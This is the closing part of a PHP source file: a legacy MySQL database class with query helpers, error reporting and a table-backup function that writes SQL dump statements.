1493 return (($this->link) ? mysql_error($this->link) : mysql_error());
1494 }
1495 function geterrno() {
1496 return intval(($this->link) ? mysql_errno($this->link) : mysql_errno());
1497 }
1498 function fetch($query, $result_type = MYSQL_ASSOC) { //MYSQL_NUM
1499 return mysql_fetch_array($query, $result_type);
1500 }
1501 function query($sql) {
1502 //echo '<p style="color:#f00;">'.$sql.'</p>';
1503 if(!($query = mysql_query($sql, $this->link))) {
1504 $this->halt('MySQL Query Error', $sql);
1505 }
1506 $this->querycount++;
1507 return $query;
1508 }
1509 function query_res($sql) {
1510 $res = '';
1511 if(!$res = mysql_query($sql, $this->link)) {
1512 $res = 0;
1513 } else if(is_resource($res)) {
1514 $res = 1;
1515 } else {
1516 $res = 2;
1517 }
1518 $this->querycount++;
1519 return $res;
1520 }
1521 function num_rows($query) {
1522 $query = mysql_num_rows($query);
1523 return $query;
1524 }
1525 function num_fields($query) {
1526 $query = mysql_num_fields($query);
1527 return $query;
1528 }
1529 function affected_rows() {
1530 return mysql_affected_rows($this->link);
1531 }
1532 function result($query, $row) {
1533 $query = mysql_result($query, $row);
1534 return $query;
1535 }
1536 function free_result($query) {
1537 $query = mysql_free_result($query);
1538 return $query;
1539 }
1540 function version() {
1541 return mysql_get_server_info($this->link);
1542 }
1543 function close() {
1544 return mysql_close($this->link);
1545 }
1546 function halt($msg =''){
1547 echo "<h2>".htmlspecialchars($msg)."</h2>\n";
1548 echo "<p class=\"b\">Mysql error description: ".htmlspecialchars($this->geterrdesc())."</p>\n";
1549 echo "<p class=\"b\">Mysql error number: ".$this->geterrno()."</p>\n";
1550 exit;
1551 }
1552 function get_fields_meta($result) {
1553 $fields = array();
1554 $num_fields = $this->num_fields($result);
1555 for ($i = 0; $i < $num_fields; $i++) {
1556 $field = mysql_fetch_field($result, $i);
1557 $fields[] = $field;
1558 }
1559 return $fields;
1560 }
1561 function sqlAddSlashes($s = ''){
1562 $s = str_replace('\\', '\\\\', $s);
1563 $s = str_replace('\'', '\'\'', $s);
1564 return $s;
1565 }
1566 // 备份数据库
1567 function sqldump($table, $fp=0) {
1568 $crlf = (IS_WIN ? "\r\n" : "\n");
1569 $search = array("\x00", "\x0a", "\x0d", "\x1a"); //\x08\\x09, not required
1570 $replace = array('\0', '\n', '\r', '\Z');
1571
1572 if (isset($this->charset) && isset($this->charsetdb[$this->charset])) {
1573 $set_names = $this->charsetdb[$this->charset];
1574 } else {
1575 $set_names = $this->charsetdb['utf-8'];
1576 }
1577 $tabledump = 'SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";'.$crlf.$crlf;
1578 $tabledump .= '/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;'.$crlf
1579 . '/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;'.$crlf
1580 . '/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;'.$crlf
1581 . '/*!40101 SET NAMES ' . $set_names . ' */;'.$crlf.$crlf;
1582
1583 $tabledump .= "DROP TABLE IF EXISTS `$table`;".$crlf;
1584 $res = $this->query("SHOW CREATE TABLE $table");
1585 $create = $this->fetch($res, MYSQL_NUM);
1586 $tabledump .= $create[1].';'.$crlf.$crlf;
1587 if (strpos($tabledump, "(\r\n ")) {
1588 $tabledump = str_replace("\r\n", $crlf, $tabledump);
1589 } elseif (strpos($tabledump, "(\n ")) {
1590 $tabledump = str_replace("\n", $crlf, $tabledump);
1591 } elseif (strpos($tabledump, "(\r ")) {
1592 $tabledump = str_replace("\r", $crlf, $tabledump);
1593 }
1594 unset($create);
1595
1596 if ($fp) {
1597 fwrite($fp,$tabledump);
1598 } else {
1599 echo $tabledump;
1600 }
1601 $tabledump = '';
1602 $rows = $this->query("SELECT * FROM $table");
1603 $fields_cnt = $this->num_fields($rows);
1604 $fields_meta = $this->get_fields_meta($rows);
1605
1606 while ($row = $this->fetch($rows, MYSQL_NUM)) {
1607 for ($j = 0; $j < $fields_cnt; $j++) {
1608 if (!isset($row[$j]) || is_null($row[$j])) {
1609 $values[] = 'NULL';
1610 } elseif ($fields_meta[$j]->numeric && $fields_meta[$j]->type != 'timestamp' && !$fields_meta[$j]->blob) {
1611 $values[] = $row[$j];
1612 } elseif ($fields_meta[$j]->blob) {
1613 if (empty($row[$j]) && $row[$j] != '0') {
1614 $values[] = '\'\'';
1615 } else {
1616 $values[] = '0x'.bin2hex($row[$j]);
1617 }
1618 } else {
1619 $values[] = '\''.str_replace($search, $replace, $this->sqlAddSlashes($row[$j])).'\'';
1620 }
1621 }
1622 $tabledump = 'INSERT INTO `'.$table.'` VALUES('.implode(', ', $values).');'.$crlf;
1623 unset($values);
1624 if ($fp) {
1625 fwrite($fp,$tabledump);
1626 } else {
1627 echo $tabledump;
1628 }
1629 }
1630 $this->free_result($rows);
1631 }
1632}
1633
1634?>